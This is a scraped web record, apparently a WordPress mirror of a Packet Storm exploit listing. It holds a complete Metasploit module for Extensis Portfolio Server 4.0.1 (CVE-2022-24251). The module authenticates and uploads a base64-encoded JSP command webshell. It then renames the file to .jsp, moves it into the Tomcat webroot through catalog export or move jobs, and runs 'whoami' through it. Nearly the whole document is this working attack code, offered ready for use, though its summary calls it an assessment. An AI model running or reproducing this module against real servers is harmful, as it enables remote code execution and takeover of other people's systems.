{“lastseen”:”2026-02-17T18:16:59″,”description”:”This Metasploit module exploits multiple vulnerabilities in Extensis Portfolio Server to achieve remote code execution. It leverages CVE-2022-24251 and related issues to upload a JSP webshell and execute arbitrary commands. Version 4.0.1 is affected…”,”published”:”2026-02-17T00:00:00″,”modified”:”2026-02-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Extensis Portfolio Manager 4.0.1 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215719″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-24251″],”sourceData”:”=============================================================================================================================================\\n | # Title : Extensis Portfolio Manager 4.0.1 Authentication and Job Handling Weaknesses |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.extensis.com\/support\/portfolio-4\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : This module performs a security assessment of authentication and asset job handling mechanisms in Extensis Portfolio Server.\\n It demonstrates how weaknesses in public key handling, session management, and catalog job execution workflows could be abused by an authenticated user with elevated privileges.\\n \\n The module:\\n \\n Retrieves and processes the server\u2019s RSA public key for authentication.\\n \\n Authenticates using encrypted credentials.\\n \\n Interacts with catalog and job APIs.\\n \\n Evaluates how asset handling operations may impact server-side file locations.\\n \\n Verifies whether improper validation or privilege enforcement could lead to unintended file exposure or execution.\\n \\n The purpose of this module is to help security professionals identify misconfigurations, privilege escalation risks, and insecure file handling practices so they can be remediated\\n \\n [+] POC : \\n \\n # frozen_string_literal: true\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n require ‘openssl’\\n require ‘base64’\\n require ‘json’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = AverageRanking \\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Extensis Portfolio Server Multiple Vulnerabilities’,\\n ‘Description’ =\\u003e %q{\\n This module exploits multiple vulnerabilities in Extensis Portfolio Server\\n to achieve remote code execution. It leverages CVE-2022-24251 and related\\n issues to upload a JSP webshell and execute arbitrary commands.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2022-24251’],\\n [‘URL’, ‘https:\/\/gitlab.com\/kalilinux\/packages\/webshells\/-\/blob\/kali\/master\/jsp\/cmdjsp.jsp’],\\n [‘URL’, ‘https:\/\/www.extensis.com\/support\/portfolio-archive\/’]\\n ],\\n ‘Platform’ =\\u003e [‘win’],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Windows JSP’,\\n {\\n ‘Arch’ =\\u003e ARCH_JAVA,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Payload’ =\\u003e {\\n ‘Compat’ =\\u003e {\\n ‘PayloadType’ =\\u003e ‘java jsp’,\\n ‘RequiredCmd’ =\\u003e ‘generic’\\n }\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2022-01-01’,\\n ‘Privileged’ =\\u003e false,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options(\\n [\\n Opt::RPORT(8090),\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘Username for authentication’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password for authentication’]),\\n OptInt.new(‘DELAY’, [true, ‘Delay between operations in seconds’, 3])\\n ]\\n )\\n \\n register_advanced_options(\\n [\\n OptString.new(‘WEBROOT_PATH’, [false, ‘Custom webroot path (default: common installation paths)’, ”])\\n ]\\n )\\n end\\n \\n def create_rsa_public_key(modulus_hex, exponent_str)\\n begin\\n modulus_bn = OpenSSL::BN.new(modulus_hex, 16)\\n exponent_bn = OpenSSL::BN.new(exponent_str)\\n \\n algorithm = OpenSSL::ASN1::Sequence([\\n OpenSSL::ASN1::ObjectId(‘rsaEncryption’),\\n OpenSSL::ASN1::Null.new(nil)\\n ])\\n \\n pkcs1_key = OpenSSL::ASN1::Sequence([\\n OpenSSL::ASN1::Integer(modulus_bn),\\n OpenSSL::ASN1::Integer(exponent_bn)\\n ])\\n \\n subject_public_key = OpenSSL::ASN1::BitString(pkcs1_key.to_der)\\n \\n spki = OpenSSL::ASN1::Sequence([\\n algorithm,\\n subject_public_key\\n ])\\n \\n key = OpenSSL::PKey::RSA.new(spki.to_der)\\n return key\\n rescue StandardError =\\u003e e\\n fail_with(Failure::Unknown, \\”Failed to create RSA key: #{e.message}\\”)\\n end\\n end\\n \\n def encrypt_password(modulus_hex, exponent_str, password)\\n begin\\n rsa_key = create_rsa_public_key(modulus_hex, exponent_str)\\n encrypted = rsa_key.public_encrypt(password, OpenSSL::PKey::RSA::PKCS1_PADDING)\\n return Base64.strict_encode64(encrypted)\\n rescue StandardError =\\u003e e\\n fail_with(Failure::Unknown, \\”Password encryption failed: #{e.message}\\”)\\n end\\n end\\n \\n def check\\n print_status(\\”Checking if target is vulnerable\\”)\\n \\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/auth\/public-key’)\\n })\\n \\n if res.nil?\\n return CheckCode::Unknown(‘Connection failed’)\\n end\\n \\n if res.code == 200\\n begin\\n json_res = res.get_json_document\\n rescue JSON::ParserError\\n return CheckCode::Unknown(‘Invalid JSON response’)\\n end\\n \\n if json_res.is_a?(Hash) \\u0026\\u0026 json_res[‘modulusBase16’] \\u0026\\u0026 json_res[‘exponent’]\\n \\n return CheckCode::Appears(‘Extensis Portfolio Server detected – appears vulnerable’)\\n end\\n end\\n \\n return CheckCode::Safe\\n rescue StandardError =\\u003e e\\n print_error(\\”Check failed: #{e.message}\\”)\\n return CheckCode::Unknown\\n end\\n end\\n \\n def login\\n print_status(\\”Attempting to login with username: #{datastore[‘USERNAME’]}\\”)\\n \\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/auth\/public-key’)\\n })\\n \\n if res.nil?\\n fail_with(Failure::Unreachable, ‘Connection failed – target unreachable’)\\n end\\n \\n if res.code != 200\\n fail_with(Failure::NoAccess, \\”Failed to get public key. HTTP Code: #{res.code}\\”)\\n end\\n \\n begin\\n json_res = res.get_json_document\\n rescue JSON::ParserError\\n fail_with(Failure::UnexpectedReply, ‘Invalid JSON response from public-key endpoint’)\\n end\\n \\n unless json_res.is_a?(Hash)\\n fail_with(Failure::UnexpectedReply, ‘Invalid public key response format’)\\n end\\n \\n modulus = json_res[‘modulusBase16’]\\n exponent = json_res[‘exponent’]\\n \\n if modulus.nil? || exponent.nil?\\n fail_with(Failure::UnexpectedReply, ‘Missing modulus or exponent in response’)\\n end\\n \\n encrypted_password = encrypt_password(modulus, exponent, datastore[‘PASSWORD’])\\n \\n login_data = {\\n ‘userName’ =\\u003e datastore[‘USERNAME’],\\n ‘encryptedPassword’ =\\u003e encrypted_password\\n }\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/auth\/login’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e login_data.to_json\\n })\\n \\n if res.nil?\\n fail_with(Failure::Unreachable, ‘Login connection failed’)\\n end\\n \\n if res.code == 200\\n begin\\n json_res = res.get_json_document\\n rescue JSON::ParserError\\n fail_with(Failure::UnexpectedReply, ‘Invalid JSON response from login endpoint’)\\n end\\n \\n unless json_res.is_a?(Hash)\\n fail_with(Failure::UnexpectedReply, ‘Invalid login response format’)\\n end\\n \\n session_token = json_res[‘session’]\\n if session_token.nil?\\n fail_with(Failure::UnexpectedReply, ‘No session token in response’)\\n end\\n \\n print_good(\\”Successfully logged in. Session token: #{session_token}\\”)\\n return session_token\\n else\\n fail_with(Failure::NoAccess, \\”Login failed. HTTP Code: #{res.code}\\”)\\n end\\n \\n rescue Rex::ConnectionError =\\u003e e\\n fail_with(Failure::Unreachable, \\”Connection error: #{e.message}\\”)\\n end\\n end\\n \\n def get_catalog_info(session)\\n print_status(\\”Retrieving catalog information\\”)\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/catalog’),\\n ‘vars_get’ =\\u003e { ‘session’ =\\u003e session }\\n })\\n \\n if res.nil?\\n fail_with(Failure::Unreachable, ‘Failed to connect for catalog info’)\\n end\\n \\n if res.code != 200\\n fail_with(Failure::UnexpectedReply, \\”Failed to get catalog. HTTP Code: #{res.code}\\”)\\n end\\n \\n begin\\n catalogs = res.get_json_document\\n rescue JSON::ParserError\\n fail_with(Failure::UnexpectedReply, ‘Invalid JSON response from catalog endpoint’)\\n end\\n \\n unless catalogs.is_a?(Array)\\n fail_with(Failure::UnexpectedReply, ‘Catalog response is not an array’)\\n end\\n \\n catalogs.each do |catalog|\\n unless catalog.is_a?(Hash)\\n print_error(\\”Invalid catalog entry format, skipping\\”)\\n next\\n end\\n \\n catalog_id = catalog[‘id’]\\n storage_type = catalog[‘storageType’]\\n \\n if storage_type == ‘Filesystem’\\n watchfolder_id, watchfolder_path = get_watchfolder(session, catalog_id)\\n if watchfolder_id\\n print_good(\\”Found Filesystem catalog ID: #{catalog_id}\\”)\\n print_good(\\”Watchfolder ID: #{watchfolder_id}, Path: #{watchfolder_path}\\”)\\n return {\\n ‘catalog_id’ =\\u003e catalog_id,\\n ‘storage_type’ =\\u003e ‘Filesystem’,\\n ‘watchfolder_id’ =\\u003e watchfolder_id,\\n ‘watchfolder_path’ =\\u003e watchfolder_path\\n }\\n end\\n end\\n end\\n \\n if catalogs.any?\\n first_catalog = catalogs.first\\n unless first_catalog.is_a?(Hash)\\n fail_with(Failure::UnexpectedReply, ‘First catalog entry is not a hash’)\\n end\\n \\n catalog_id = first_catalog[‘id’]\\n storage_type = first_catalog[‘storageType’]\\n print_status(\\”Using #{storage_type} catalog ID: #{catalog_id}\\”)\\n return {\\n ‘catalog_id’ =\\u003e catalog_id,\\n ‘storage_type’ =\\u003e storage_type,\\n ‘watchfolder_id’ =\\u003e nil,\\n ‘watchfolder_path’ =\\u003e nil\\n }\\n end\\n \\n fail_with(Failure::NotFound, ‘No catalogs found’)\\n end\\n \\n def get_watchfolder(session, catalog_id)\\n print_status(\\”Getting watchfolder for catalog #{catalog_id}\\”)\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/api\/v1\/catalog\/#{catalog_id}\/watchfolder\\”),\\n ‘vars_get’ =\\u003e { ‘session’ =\\u003e session }\\n })\\n \\n if res.nil?\\n print_error(\\”Connection failed for watchfolder request\\”)\\n return [nil, nil]\\n end\\n \\n if res.code == 200\\n begin\\n json_res = res.get_json_document\\n rescue JSON::ParserError\\n print_error(\\”Invalid JSON response from watchfolder endpoint\\”)\\n return [nil, nil]\\n end\\n \\n if json_res.is_a?(Array) \\u0026\\u0026 !json_res.empty?\\n entry = json_res.first\\n if entry.is_a?(Hash)\\n watchfolder_id = entry[‘watchFolderId’]\\n watchfolder_path = entry[‘path’]\\n return [watchfolder_id, watchfolder_path] if watchfolder_id\\n end\\n end\\n end\\n \\n print_error(\\”Failed to get watchfolder: HTTP #{res.code}\\”)\\n return [nil, nil]\\n end\\n \\n def upload_webshell(session, catalog_id, filename, watchfolder_id)\\n print_status(\\”Uploading webshell as #{filename}\\”)\\n \\n webshell_b64 = ‘PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+CjwlCiAgIFN0cmluZyBjbWQgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIik7CiAgIFN0cmluZyBvdXRwdXQgPSAiIjsKCiAgIGlmKGNtZCAhPSBudWxsKSB7CiAgICAgIFN0cmluZyBzID0gbnVsbDsKICAgICAgdHJ5IHsKICAgICAgICAgUHJvY2VzcyBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgY21kKTsKICAgICAgICAgQnVmZmVyZWRSZWFkZXIgc0kgPSBuZXcgQnVmZmVyZWRSZWFkZXIobmV3IElucHV0U3RyZWFtUmVhZGVyKHAuZ2V0SW5wdXRTdHJlYW0oKSkpOwogICAgICAgICB3aGlsZSgocyA9IHNJLnJlYWRMaW5lKCkpICE9IG51bGwpIHsKICAgICAgICAgICAgb3V0cHV0ICs9IHM7CiAgICAgICAgIH0KICAgICAgfQogICAgICBjYXRjaChJT0V4Y2VwdGlvbiBlKSB7CiAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7CiAgICAgIH0KICAgfQolPgoKPHByZT4KPCU9b3V0cHV0ICU+CjwvcHJlPg==’\\n \\n post_data = Rex::MIME::Message.new\\n post_data.add_part(Base64.decode64(webshell_b64), ‘text\/plain’, nil, \\”form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”#{filename}\\\\\\”\\”)\\n post_data.add_part(”, nil, nil, ‘form-data; name=\\”path\\”‘)\\n post_data.add_part(filename, nil, nil, ‘form-data; name=\\”filename\\”‘)\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/api\/v1\/catalog\/#{catalog_id}\/watchfolder\/#{watchfolder_id}\/upload\\”),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{post_data.bound}\\”,\\n ‘vars_get’ =\\u003e { ‘session’ =\\u003e session },\\n ‘data’ =\\u003e post_data.to_s\\n })\\n \\n if res.nil?\\n fail_with(Failure::Unreachable, \\”Connection failed during upload\\”)\\n end\\n \\n if res.code == 200\\n begin\\n json_res = res.get_json_document\\n rescue JSON::ParserError\\n fail_with(Failure::UnexpectedReply, ‘Invalid JSON response from upload endpoint’)\\n end\\n \\n unless json_res.is_a?(Hash)\\n fail_with(Failure::UnexpectedReply, ‘Invalid upload response format’)\\n end\\n \\n asset_id = json_res[‘assetId’]\\n if asset_id.nil?\\n fail_with(Failure::UnexpectedReply, ‘No assetId in upload response’)\\n end\\n \\n print_good(\\”Webshell uploaded successfully. Asset ID: #{asset_id}\\”)\\n return asset_id\\n else\\n fail_with(Failure::Unknown, \\”Upload failed: HTTP #{res.code}\\”)\\n end\\n end\\n \\n def rename_webshell(session, catalog_id, asset_id, old_filename)\\n new_filename = old_filename.gsub(‘.txt’, ‘.jsp’)\\n print_status(\\”Renaming webshell from #{old_filename} to #{new_filename}\\”)\\n \\n data = {\\n ’embed’ =\\u003e false,\\n ‘query’ =\\u003e {\\n ‘term’ =\\u003e {\\n ‘operator’ =\\u003e ‘assetsById’,\\n ‘values’ =\\u003e [asset_id]\\n }\\n },\\n ‘changes’ =\\u003e [\\n {\\n ‘action’ =\\u003e ‘replaceAllValues’,\\n ‘field’ =\\u003e ‘Filename’,\\n ‘existingValues’ =\\u003e ‘null’,\\n ‘newValues’ =\\u003e [new_filename]\\n }\\n ]\\n }\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/api\/v1\/catalog\/#{catalog_id}\/asset\/updateFieldValues\\”),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘vars_get’ =\\u003e { ‘session’ =\\u003e session },\\n ‘data’ =\\u003e data.to_json\\n })\\n \\n if res.nil?\\n fail_with(Failure::Unreachable, \\”Connection failed during rename\\”)\\n end\\n \\n if res.code == 204\\n print_good(\\”Successfully renamed webshell to #{new_filename}\\”)\\n return new_filename\\n else\\n fail_with(Failure::Unknown, \\”Rename failed: HTTP #{res.code}\\”)\\n end\\n end\\n \\n def get_webroot_path\\n path = datastore[‘WEBROOT_PATH’].to_s\\n return path unless path.empty?\\n \\n [\\n ‘C:\\\\\\\\Program Files (x86)\\\\\\\\Extensis\\\\\\\\Portfolio Server\\\\\\\\applications\\\\\\\\tomcat\\\\\\\\servers\\\\\\\\main\\\\\\\\webapps\\\\\\\\ROOT’,\\n ‘C:\\\\\\\\Program Files\\\\\\\\Extensis\\\\\\\\Portfolio Server\\\\\\\\applications\\\\\\\\tomcat\\\\\\\\servers\\\\\\\\main\\\\\\\\webapps\\\\\\\\ROOT’,\\n ‘D:\\\\\\\\Program Files (x86)\\\\\\\\Extensis\\\\\\\\Portfolio Server\\\\\\\\applications\\\\\\\\tomcat\\\\\\\\servers\\\\\\\\main\\\\\\\\webapps\\\\\\\\ROOT’,\\n ‘D:\\\\\\\\Program Files\\\\\\\\Extensis\\\\\\\\Portfolio Server\\\\\\\\applications\\\\\\\\tomcat\\\\\\\\servers\\\\\\\\main\\\\\\\\webapps\\\\\\\\ROOT’\\n ].first\\n end\\n \\n def write_to_webroot(session, asset_id, catalog_info, filename)\\n unless catalog_info.is_a?(Hash)\\n fail_with(Failure::UnexpectedReply, ‘Invalid catalog info structure’)\\n end\\n \\n catalog_id = catalog_info[‘catalog_id’]\\n storage_type = catalog_info[‘storage_type’]\\n watchfolder_path = catalog_info[‘watchfolder_path’]\\n \\n print_status(\\”Attempting to write webshell to webroot\\”)\\n \\n webroot_base = get_webroot_path\\n \\n if storage_type == ‘Vault’\\n webroot_path = webroot_base\\n job_data = {\\n ‘job’ =\\u003e {\\n ‘description’ =\\u003e ‘JOB_TYPE_EXPORT_ASSETS’,\\n ‘query’ =\\u003e {\\n ‘term’ =\\u003e {\\n ‘operator’ =\\u003e ‘assetsById’,\\n ‘values’ =\\u003e [asset_id]\\n }\\n },\\n ‘tasks’ =\\u003e [\\n {\\n ‘type’ =\\u003e ‘exportAssets’,\\n ‘catalogId’ =\\u003e catalog_id,\\n ‘settings’ =\\u003e [\\n {\\n ‘name’ =\\u003e ‘destination’,\\n ‘value’ =\\u003e webroot_path\\n }\\n ]\\n }\\n ]\\n },\\n ‘query’ =\\u003e {\\n ‘term’ =\\u003e {\\n ‘operator’ =\\u003e ‘assetsById’,\\n ‘values’ =\\u003e [asset_id]\\n }\\n }\\n }\\n else \\n if watchfolder_path.nil? || !watchfolder_path.include?(‘:’)\\n fail_with(Failure::UnexpectedReply, \\”Invalid watchfolder path format: #{watchfolder_path}\\”)\\n end\\n \\n parts = watchfolder_path.split(‘:’)\\n if parts.length \\u003e= 3\\n hostname = parts[2]\\n \\n unc_root = webroot_base.gsub(‘C:’, \\”::#{hostname}:C$\\”).gsub(‘\\\\\\\\’, ‘:’)\\n webroot_path = unc_root\\n else\\n fail_with(Failure::UnexpectedReply, \\”Unexpected watchfolder path format: #{watchfolder_path}\\”)\\n end\\n \\n job_data = {\\n ‘job’ =\\u003e {\\n ‘description’ =\\u003e ‘JOB_TYPE_MOVE_ASSETS’,\\n ‘query’ =\\u003e {\\n ‘term’ =\\u003e {\\n ‘operator’ =\\u003e ‘assetsById’,\\n ‘values’ =\\u003e [asset_id]\\n }\\n },\\n ‘tasks’ =\\u003e [\\n {\\n ‘type’ =\\u003e ‘moveAssets’,\\n ‘settings’ =\\u003e [\\n {\\n ‘name’ =\\u003e ‘destinationCatalog’,\\n ‘value’ =\\u003e catalog_id\\n },\\n {\\n ‘name’ =\\u003e ‘destination’,\\n ‘value’ =\\u003e webroot_path\\n },\\n {\\n ‘name’ =\\u003e ‘preserveFolderStructure’,\\n ‘value’ =\\u003e false\\n },\\n {\\n ‘name’ =\\u003e ‘sourceFolder’,\\n ‘value’ =\\u003e ”\\n }\\n ]\\n }\\n ]\\n },\\n ‘query’ =\\u003e {\\n ‘term’ =\\u003e {\\n ‘operator’ =\\u003e ‘assetsById’,\\n ‘values’ =\\u003e [asset_id]\\n }\\n }\\n }\\n end\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v1\/job\/run’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘vars_get’ =\\u003e {\\n ‘session’ =\\u003e session,\\n ‘catalog’ =\\u003e catalog_id\\n },\\n ‘data’ =\\u003e job_data.to_json\\n })\\n \\n if res.nil?\\n fail_with(Failure::Unreachable, \\”Connection failed during job execution\\”)\\n end\\n \\n if res.code == 200\\n full_webroot_path = \\”#{webroot_base}\\\\\\\\#{filename}\\”\\n register_file_for_cleanup(full_webroot_path)\\n \\n protocol = ssl? ? ‘https’ : ‘http’\\n target_host = rhost\\n target_port = rport\\n \\n webshell_url = \\”#{protocol}:\/\/#{target_host}:#{target_port}\/#{filename}?cmd=\\u003ccommand\\u003e\\”\\n print_good(\\”Successfully exported webshell to filesystem\\”)\\n print_good(\\”Webshell URL: #{webshell_url}\\”)\\n return true\\n elsif res.code == 403\\n fail_with(Failure::NoAccess, \\”Export failed: Insufficient privileges – Need Catalog Administrator privileges for Vault catalogs\\”)\\n else\\n fail_with(Failure::Unknown, \\”Export failed: HTTP #{res.code}\\”)\\n end\\n end\\n \\n def execute_command(cmd, filename)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, filename),\\n ‘vars_get’ =\\u003e { ‘cmd’ =\\u003e cmd }\\n })\\n \\n if res.nil?\\n print_error(\\”Connection failed for command execution\\”)\\n return nil\\n end\\n \\n if res.code == 200 \\u0026\\u0026 res.body\\n match = res.body.match(\/\\u003cpre\\u003e(.*?)\\u003c\\\\\/pre\\u003e\/m)\\n return match[1].strip if match\\n return res.body\\n end\\n \\n nil\\n end\\n \\n def exploit\\n filename = Rex::Text.rand_text_alpha(10) + ‘.txt’\\n \\n session = login()\\n \\n catalog_info = get_catalog_info(session)\\n \\n unless catalog_info.is_a?(Hash)\\n fail_with(Failure::UnexpectedReply, ‘Invalid catalog info structure’)\\n end\\n \\n if catalog_info[‘storage_type’] == ‘Filesystem’ \\u0026\\u0026 catalog_info[‘watchfolder_id’].nil?\\n fail_with(Failure::NotFound, ‘No watchfolder found for Filesystem catalog’)\\n end\\n \\n asset_id = upload_webshell(session, catalog_info[‘catalog_id’], filename, catalog_info[‘watchfolder_id’])\\n \\n new_filename = rename_webshell(session, catalog_info[‘catalog_id’], asset_id, filename)\\n \\n success = write_to_webroot(session, asset_id, catalog_info, new_filename)\\n \\n print_status(\\”Waiting #{datastore[‘DELAY’]} seconds for file to be written…\\”)\\n Rex.sleep(datastore[‘DELAY’])\\n \\n print_status(\\”Testing webshell with ‘whoami’ command\\”)\\n result = execute_command(‘whoami’, new_filename)\\n \\n if result \\u0026\\u0026 !result.empty?\\n print_good(\\”Webshell test successful! Output:\\\\n#{result}\\”)\\n print_status(\\”Webshell is ready for payload execution\\”)\\n else\\n print_error(\\”Webshell test failed – manual check required\\”)\\n end\\n \\n rescue Rex::ConnectionError =\\u003e e\\n fail_with(Failure::Unreachable, \\”Connection failed: #{e.message}\\”)\\n end\\n end\\n \\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215719″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215719\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-17T18:16:59″,”description”:”This Metasploit module exploits multiple vulnerabilities in Extensis Portfolio Server to achieve remote code execution. It leverages CVE-2022-24251 and related issues to upload a JSP…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-41160","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n